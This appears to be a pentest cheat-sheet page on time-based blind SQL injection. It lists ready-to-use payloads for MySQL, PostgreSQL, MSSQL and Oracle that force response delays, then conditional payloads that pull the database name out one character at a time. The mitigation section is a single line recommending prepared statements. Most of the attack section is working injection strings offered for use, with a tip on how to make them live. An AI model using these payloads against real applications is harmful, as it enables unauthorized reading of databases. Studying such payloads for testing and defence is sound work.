🧠 SQLi - Time-based Blind

Exploitation

Prerequisites:

  • The application must be vulnerable to SQL injection.
  • Network latency must be stable enough to accurately measure response delays (high jitter can cause false positives).

Time-based SQL can be implemented in almost any context.

Think of this as the last resort since for a large database, the extraction process can takes hours to days.

Attack Vectors

Step 1: Forcing time delay (change the ` into ' in practice)

-- MySQL / MariaDB
` OR SLEEP(5)--
` UNION SELECT SLEEP(5)--
 
-- PostgreSQL
` OR pg_sleep(5)--
 
-- MSSQL (Microsoft SQL Server)
`; WAITFOR DELAY '0:0:5'--
 
-- Oracle
` AND [RANDOM_HEAVY_QUERY]-- (Oracle lacks a direct sleep function, so you force it to compute a heavy task like querying the all_objects table multiple times)

Step 2: Extract the data

-- MySQL (Using IF statement)
-- Is the first character of the database name 'm' (ASCII 109)? If yes, sleep 5 seconds.
` OR IF(ASCII(SUBSTRING(database(), 1, 1)) = 109, SLEEP(5), 0)--
 
-- PostgreSQL (Using CASE statement)
` OR (SELECT CASE WHEN (ASCII(SUBSTRING(current_database(), 1, 1)) = 109) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
 
-- MSSQL (Using IF statement)
`; IF (ASCII(SUBSTRING((SELECT DB_NAME()), 1, 1)) = 109) WAITFOR DELAY '0:0:5'--

Mitigation

Fix: Use Prepared Statements

FileCreated